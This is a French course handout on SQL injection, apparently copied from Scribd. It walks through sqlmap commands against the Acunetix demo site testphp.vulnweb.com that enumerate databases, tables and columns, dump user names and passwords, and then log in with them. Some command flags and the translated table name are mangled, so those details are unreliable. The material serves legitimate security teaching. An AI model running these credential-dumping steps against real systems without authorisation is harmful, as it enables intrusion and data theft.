0% ont trouvé ce document utile (0 vote)
44 vues6 pages

Sqlmap TP SQLInjection

Le document traite de l'injection SQL, une méthode d'attaque permettant d'exécuter des requêtes SQL malveillantes sur des bases de données d'applications Web, et souligne l'importance de la détection et de l'évitement de telles attaques. Il présente également sqlmap, un outil open source pour tester les vulnérabilités d'injection SQL, et fournit des instructions sur son utilisation pour interagir avec une base de données vulnérable. Des exemples de commandes sqlmap sont fournis pour rechercher des bases de données, des tables et des colonnes, ainsi que pour extraire des informations sensibles.

Transféré par

Issif Imorou
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
44 vues6 pages

Sqlmap TP SQLInjection

Le document traite de l'injection SQL, une méthode d'attaque permettant d'exécuter des requêtes SQL malveillantes sur des bases de données d'applications Web, et souligne l'importance de la détection et de l'évitement de telles attaques. Il présente également sqlmap, un outil open source pour tester les vulnérabilités d'injection SQL, et fournit des instructions sur son utilisation pour interagir avec une base de données vulnérable. Des exemples de commandes sqlmap sont fournis pour rechercher des bases de données, des tables et des colonnes, ainsi que pour extraire des informations sensibles.

Transféré par

Issif Imorou
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Maîtrise de l‘Audit des Risques des Systèmes

d‘Information avec Préparation CISA

L'injection SQL :

L'injection SQL est un type d'attaque par injection de code qui permet à un attaquant d'injecter et
d'exécuter des requêtes SQL malveillantes dans un serveur de base de données d'applications Web,
leur accordant l'accès. C'est le moyen le plus courant de tirer parti des bogues de sécurité. Certaines
attaques par injection SQL peuvent révéler des informations confidentielles sur les clients, tandis que
d'autres peuvent effacer une base de données. Certaines applications sont accessibles à distance.

L'injection SQL est une méthode d'attaque relativement simple et largement utilisée. Les attaques
SQLI doivent être évitées et détectées dans le cadre de toute évaluation de la sécurité.

SQLMAP :

Sqlmap est un outil de test d'intrusion open source permettant de détecter et d'exploiter les
vulnérabilités d'injection SQL, ainsi que de prendre le contrôle des serveurs de bases de données.

Il comprend un moteur de détection puissant, diverses fonctionnalités spécialisées pour le testeur


d'intrusion ultime et un large éventail d'options qui couvrent l'empreinte digitale de la base de
données, la récupération des données à partir des bases de données, l'accès au système de fichiers
sous-jacent et l'exécution de commandes hors bande sur le système d'exploitation. Système.

Pour commencer, nous utiliserons l'outil automatisé sqlmap de Kali Linux pour effectuer l'injection
SQL. On utilise testphp.vulnweb.com. Il s'agit d'un site de démonstration pour le scanner de
vulnérabilité Web Acunetix.

Recherche de base de données :

Sqlmap --help

Sélectionner http://testphp.vulnweb.com/artists.php?artist=1 copiez le lien et collez-le dans le


terminal à l'aide de la commande sqlmap.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 –dbs

Pour trouver la base de données. Comme vous pouvez le constater, deux bases de données sont
disponibles sur le site Web.

Trouvons les tables de la base de données à l'aide de la commande :

sqlmap –u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart –tables

Vous verrez la liste des tables disponibles dans la base de données acurat.

Dr. Mohamed EL GHAZOUANI Page 1 sur 6


Recherche de colonnes :
Trouvons les tables et les colonnes de la base de données pour avoir une meilleure idée du site Web.
Utilisez la commande :

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -columns.

Vous obtiendrez les colonnes avec le nom de la table :

Dr. Mohamed EL GHAZOUANI Page 2 sur 6


Dr. Mohamed EL GHAZOUANI Page 3 sur 6
Maintenant que nous connaissons les colonnes, essayons de trouver la valeur des colonnes. Utilisez la
commande :

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname –dump

Dr. Mohamed EL GHAZOUANI Page 4 sur 6


De la même manière, vous pouvez obtenir le mot de passe pour le uname. Utiliser la commande :

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T utilisateurs -C pass –dump

Pour quitter vim on tappe :q!  shiftM+shift1

Connectez-vous avec les informations d'identification obtenues et vérifiez les détails.

Dr. Mohamed EL GHAZOUANI Page 5 sur 6


Dr. Mohamed EL GHAZOUANI Page 6 sur 6

Vous aimerez peut-être aussi